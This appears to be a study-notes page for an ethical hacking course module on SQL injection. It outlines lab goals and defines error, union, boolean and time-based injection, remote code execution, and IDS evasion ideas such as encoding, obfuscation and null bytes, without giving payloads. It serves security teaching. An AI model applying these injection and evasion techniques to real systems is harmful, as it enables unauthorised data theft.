Module15 SQL Injection
Module 15: SQL Injections
Learn about SQL injection attack techniques, injection detection tools, and
countermeasures to detect and defend against SQL injection attempts.
Hands-On Lab Exercises: Over 4 hands-on exercises with real-lif e simulated
targets to build skills on how to:
> Perform an SQl injection attack against MSSQL to extract databases
> Detect SQL injection vulnerabilities using various SQL injection detection tools
Key topics covered:
> SQL Injection
> Types of SQL injection
> Blind SQL Injection
> SQL Injection Methodology
> SQL Injection Tools
> Signature Evasion Techniques
> SQL Injection Detection Tools
Section 01: SQL Injection Concepts
Structured query language (SQL)
Structured Query Language, abbreviated as SQL,(/ˈsiːkwəl/ "sequel", /ˌɛsˌkjuːˈɛl/ (listen) S-Q-L; )[4][5] is a domain-specific language used in programming and designed for managing data held in a relational database management system (RDBMS), or for stream processing in a relational data stream management system (RDSMS).
Structured query language (SQL) injection
In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Error based SQLi
The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
Union based SQLi
This technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
Boolean based SQLi
That attacker sends a SQL query to the database prompting the application to return a result. The result will vary depending on whether the query is true or false. Based on the result, the information within the HTTP response will modify or stay unchanged. The attacker can then work out if the message generated a true or false result.
Time based SQLi
Attacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, an HTTP response will be generated instantly or after a waiting period.
Remote code execution (RCE)
In computer security, arbitrary code execution (ACE) is an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process. An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution.
Section 02: Types of SQL Injection
Section 03: Evading Techniques
Intrusion detection system (IDS):
An intrusion detection system (IDS; also intrusion prevention system or IPS) is a device or software application that monitors a network or systems for malicious activity or policy violations.
Encoding:
Character encoding is the process of assigning numbers to graphical characters, especially the written characters of human language, allowing them to be stored, transmitted, and transformed using digital computers.
Obfuscation:
In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.
Concatenation
In formal language theory and computer programming, string concatenation is the operation of joining character strings end-to-end. For example, the concatenation of "snow" and "ball" is "snowball". In certain formalisations of concatenation theory, also called string theory, string concatenation is a primitive notion.
Null byte
The null character (also null terminator) is a control character with the value zero. It is present in many character sets, including those defined by the Baudot and ITA2 codes, ISO/IEC 646 (or ASCII), the C0 control code, the Universal Coded Character Set (or Unicode), and EBCDIC. It is available in nearly all mainstream programming languages. A null character can be placed in a URL with the percent code %00.
0 Comments: